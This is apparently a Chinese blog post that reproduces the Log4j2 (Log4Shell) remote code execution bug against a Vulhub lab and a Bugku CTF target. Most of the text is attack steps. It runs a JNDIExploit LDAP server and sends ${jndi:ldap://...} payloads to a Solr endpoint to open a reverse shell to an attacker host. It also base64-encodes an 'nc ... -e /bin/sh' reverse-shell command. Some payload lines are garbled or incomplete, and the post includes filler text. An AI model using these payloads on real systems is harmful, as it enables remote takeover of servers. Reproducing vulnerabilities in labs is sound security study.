前言:好久之前都想复现下这个著名的漏洞了,但复现之后好像还没完全理解,等实战遇到了再说吧。。
Vulhub靶场
靶机:192.168.234.193
中转机:192.168.234.1 (jdk1.80)
攻击机:192.168.234.129
构造下获取版本号的请求
${sys:java.version}.7578feaa.dns.whitehat.asia.} {jndi:dns://
反弹shell则需要在中转机上启动一个LDAP服务
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 192.168.234.1
然后去访问
/solr/admin/cores?action=${jndi:ldap://192.168.234.1:1389/Basic/ReverseShell/192.168.234.129/6666}
Apache Log4j2 RCE (Bugku)
这里使用Log4j2Scan插件来对其进行检测,这里应用为Dnslog检测
发送到插件进行主动扫描
发现了一堆打到平台的记录,漏洞存在。
${sys:java.version}.7578feaa.dns.whitehat.asia.} {jndi:dns://
使用JNDI注入工具起一个LDAP服务,在监听一下6666端口
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 47.115.221.17
将反弹shell的命令进行base64加密加密后填入Base64部分。
nc x.x.x.x 12345 -e /bin/sh
${jndi:ldap://x.x.x.x:1389/Basic/Command/Base64
凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字凑字
原文始发于微信公众号(飞奔的狸花猫):记一次Log4j2命令执行漏洞复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论